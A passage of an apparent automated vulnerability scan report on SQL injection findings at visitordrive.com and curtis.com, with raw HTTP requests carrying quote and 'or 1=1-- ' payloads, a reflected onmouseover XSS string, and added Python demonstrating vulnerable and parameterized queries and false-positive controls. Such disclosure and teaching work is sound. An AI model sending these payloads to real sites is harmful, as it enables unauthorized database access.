Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 299
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL: select name from client where clientID='1''<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /evTracker/evtracker.php?_evacct=1''&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 0
Connection: close
Content-Type: text/html


1.6. http://visitordrive.com/evTracker/services/keywords.php [edate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/services/keywords.php

Issue detail

The edate parameter is vulnerable to SQL injection. A single quote was submitted in the edate parameter, and a database error message was returned; two single quotes were then submitted and the error message disappeared. The error leaks the query: the supplied MM/DD/YYYY value is rewritten to YYYY-MM-DD, suffixed with a time of day and concatenated into a quoted string literal, so the trailing quote closes the literal early and MySQL fails at 23:59:59' on line 6. Note also that the request carries no cookie or other credential, yet the reporting query is executed.

The database is MySQL (error 1064).

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. That alone does not fix the injection: the date should be parsed into a validated date value and passed to the query as a bound parameter (or, on the PHP 4 mysql extension, escaped with mysql_real_escape_string), never concatenated as text.

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011'&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 536
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '23:59:59'
       AND `pathQuery` != ''' at line 6)<br>
...[SNIP]...

Request 2

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011''&_=

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]

1.7. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/services/keywords.php

Issue detail

The sdate parameter is vulnerable to SQL injection. A single quote was submitted in the sdate parameter, and a database error message was returned; two single quotes were then submitted and the error message disappeared. The error shows the injected value landing in the cdate >= '... 00:00:00' clause on line 5 of the same query reported in 1.6, one line before the edate clause, so both parameters are built the same way.

The database is MySQL (error 1064).

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. As with edate, the real fix is to validate the date and pass it as a bound parameter rather than concatenating it into the statement.
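The three visitordrive.com findings (1.5, 1.6 and 1.7) share one defect: a request value is concatenated into a quoted SQL string literal. The script below is an added example, not code from this page or from the visitordrive.com application. It reconstructs both query shapes from the leaked error text, the clientID lookup and the cdate range filter, runs them against an in-memory SQLite database (standing in for MySQL, which reports the same class of syntax error), and places a bound-parameter version beside each. The table and column sets, the sample rows, the MM/DD/YYYY to YYYY-MM-DD rewrite and every function name are assumptions made for the example.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data; the table and column sets are assumptions read off
    the leaked error text, not the real visitordrive.com schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE client (clientID INTEGER, name TEXT);
        INSERT INTO client VALUES (1, 'Miller');
        CREATE TABLE click (cdate TEXT, pathQuery TEXT);
        INSERT INTO click VALUES ('2011-04-18 12:00:00', 'q=welder');
        INSERT INTO click VALUES ('2011-04-17 12:00:00', 'q=torch');
    """)
    return conn


def to_mysql_date(us_date):
    """Assumed reconstruction of the MM/DD/YYYY -> YYYY-MM-DD rewrite. Only the
    digits are matched, so a trailing quote survives into the query, which is
    what the error text near '23:59:59' in finding 1.6 shows."""
    return re.sub(r"(\d{2})/(\d{2})/(\d{4})", r"\3-\1-\2", us_date)


# --- vulnerable shapes, reconstructed from the error messages -----------------

def client_name_vulnerable(conn, evacct):
    # Finding 1.5: select name from client where clientID='1''
    sql = "select name from client where clientID='" + evacct + "'"
    return conn.execute(sql).fetchall()


def keywords_vulnerable(conn, sdate, edate):
    # Findings 1.6 and 1.7: the code opens the date literal, the user closes it.
    sql = ("select cdate, pathQuery from click"
           " where cdate >= '" + to_mysql_date(sdate) + " 00:00:00'"
           " and cdate < '" + to_mysql_date(edate) + " 23:59:59'"
           " and pathQuery != ''")
    return conn.execute(sql).fetchall()


# --- hardened shapes: the value never becomes part of the SQL text ------------

def client_name_safe(conn, evacct):
    return conn.execute("select name from client where clientID=?",
                        (evacct,)).fetchall()


def keywords_safe(conn, sdate, edate):
    sql = ("select cdate, pathQuery from click"
           " where cdate >= ? and cdate < ? and pathQuery != ''")
    return conn.execute(sql, (to_mysql_date(sdate) + " 00:00:00",
                              to_mysql_date(edate) + " 23:59:59")).fetchall()


def probe(fn, *args):
    """The scanner's observation reduced to one call: ('error', message) when the
    statement no longer parses, ('ok', rows) otherwise."""
    try:
        return ("ok", fn(*args))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for label, fn, args in [
        ("1.5 one quote, concatenated", client_name_vulnerable, (db, "1'")),
        ("1.5 two quotes, concatenated", client_name_vulnerable, (db, "1''")),
        ("1.5 one quote, bound", client_name_safe, (db, "1'")),
        ("1.7 one quote, concatenated", keywords_vulnerable, (db, "04/18/2011'", "04/18/2011")),
        ("1.7 two quotes, concatenated", keywords_vulnerable, (db, "04/18/2011''", "04/18/2011")),
        ("1.7 one quote, bound", keywords_safe, (db, "04/18/2011'", "04/18/2011")),
    ]:
        print(label, "->", probe(fn, *args))
```

Running it reproduces the pattern the scanner relies on: one quote breaks the statement, two quotes are swallowed as an escaped quote inside the literal and the query returns nothing, and the bound-parameter versions return nothing for either input without the SQL text ever changing. The example deliberately keeps the lax date rewrite to show that binding alone stops the injection; in production a strict date parse should reject a value like 04/18/2011' before it reaches the query at all.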

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011'&edate=04%2f18%2f2011&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 574
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00'
       AND `cdate` < '2011-04-18 23:59:59'
       AND `pathQuery` != ''' at line 5)<br>
...[SNIP]...

Request 2

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011''&edate=04%2f18%2f2011&_=

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]

1.8. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 53431827%20or%201%3d1--%20 and 53431827%20or%201%3d2--%20 were each appended to the existing CFID value (6175843) and submitted in the CFID cookie. These two requests resulted in different responses, which may indicate that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. Here the always-true payload produced a 302 redirect to / that expires the CFID cookie, while the always-false payload produced the normal 200 page with a freshly issued CFID/CFTOKEN pair. Both payloads are non-numeric, so the two responses are equally consistent with ColdFusion discarding a session identifier it cannot parse and issuing a new one. Before treating this as a finding, compare both responses against a plainly malformed CFID that contains no SQL; the finding stands only if the responses differ because of the boolean condition rather than because the cookie is not a number.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d1--%20; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:06:36 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d2--%20; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176368;path=/
Set-Cookie: CFTOKEN=71631396;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.9. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 17943346%20or%201%3d1--%20 and 17943346%20or%201%3d2--%20 were each appended to the existing CFTOKEN value (32575697) and submitted in the CFTOKEN cookie. These two requests resulted in different responses, which may indicate that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. As in 1.8, the always-true payload produced a 302 to / that expires the CFTOKEN cookie and the always-false payload produced the normal page with a new CFID/CFTOKEN pair, a pattern that a non-numeric session token would explain just as well as injection. Confirm manually against a malformed CFTOKEN that contains no SQL before reporting this.
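The difference-based test behind 1.8 and 1.9 only becomes trustworthy with controls around it. The script below is an added example, not code from this page or from the curtis.com application. It implements the always-true / always-false comparison together with three checks: the baseline must be stable across two requests, the always-true payload must reproduce the baseline, and the probe identifier on its own must behave like the always-false payload. It is run against three constructed targets: a hypothetical handler that concatenates the CFID cookie into a numeric comparison, a hypothetical handler that rejects non-numeric CFIDs before any query, and a transcript assembled from the CFID responses recorded in 1.8 (its baseline entry is an assumption, the ordinary 200 page seen in Response 2). The session table, response bodies and all function names are assumptions.

```python
import sqlite3

# Responses are reduced to (status, body). Set-Cookie differences are ignored on
# purpose: a fresh CFID/CFTOKEN pair is issued for every unknown session anyway.
PAGE = (200, "<title>Email Disclaimer</title>")   # constructed stand-in for the 200 body
REDIRECT = (302, "location: /")                    # constructed stand-in for the 302


def make_session_db():
    """Constructed session table; the schema is an assumption for this example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE sessions (cfid INTEGER, cftoken INTEGER);
        INSERT INTO sessions VALUES (6175843, 32575697);
    """)
    return conn


def vulnerable_target(conn):
    """Hypothetical handler: the raw cookie value lands in a numeric comparison."""
    def handle(cfid):
        try:
            n = conn.execute("select count(*) from sessions where cfid = " + cfid).fetchone()[0]
        except sqlite3.OperationalError:
            return REDIRECT
        return PAGE if n else REDIRECT
    return handle


def strict_target(conn):
    """Hypothetical handler: anything but an integer is rejected before the query,
    so every tampered cookie gets the same redirect."""
    def handle(cfid):
        if not cfid.isdigit():
            return REDIRECT
        n = conn.execute("select count(*) from sessions where cfid = ?", (int(cfid),)).fetchone()[0]
        return PAGE if n else REDIRECT
    return handle


# Transcript built from finding 1.8: the two scanner payloads with their recorded
# outcomes. The baseline row is an assumption (the normal page of Response 2).
CURTIS_TRANSCRIPT = {
    "6175843": PAGE,
    "617584353431827 or 1=1-- ": REDIRECT,
    "617584353431827 or 1=2-- ": PAGE,
}


def recorded_target(transcript):
    return lambda cfid: transcript.get(cfid)


def boolean_sqli_check(handle, valid_id, probe_id):
    """Always-true / always-false comparison with the controls that separate an
    injectable value from one that is merely validated or served unstably."""
    base1, base2 = handle(valid_id), handle(valid_id)
    if base1 != base2:
        return "inconclusive: baseline not stable"
    true_resp = handle(probe_id + " or 1=1-- ")
    false_resp = handle(probe_id + " or 1=2-- ")
    if true_resp == false_resp:
        return "not injectable"
    if true_resp != base1:
        # The pattern in 1.8 and 1.9: the always-true request is the one that breaks.
        return "inconclusive: always-true payload does not reproduce the baseline"
    if handle(probe_id) != false_resp:
        return "inconclusive: probe id alone does not match the always-false payload"
    return "likely injectable"


if __name__ == "__main__":
    db = make_session_db()
    for name, target in [("concatenating handler", vulnerable_target(db)),
                         ("validating handler", strict_target(db)),
                         ("recorded curtis.com responses", recorded_target(CURTIS_TRANSCRIPT))]:
        print(name, "->", boolean_sqli_check(target, "6175843", "617584353431827"))
```

The probe identifier is the original CFID with extra digits appended, exactly as the scanner did, so that the always-false payload does not still match the real session row; appending the payload to a valid identifier would make or 1=2 a no-op and hide a real injection. Against the recorded curtis.com responses the check stops at the second control, which is the manual-review outcome the note above asks for.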

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=3257569717943346%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:06:43 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=3257569717943346%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176385;path=/
Set-Cookie: CFTOKEN=23633185;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.10. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 59265610'%20or%201%3d1--%20 and 59265610'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm59265610'%20or%201%3d1--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /emaildisclaimer.cfm59265610'%20or%201%3d2--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
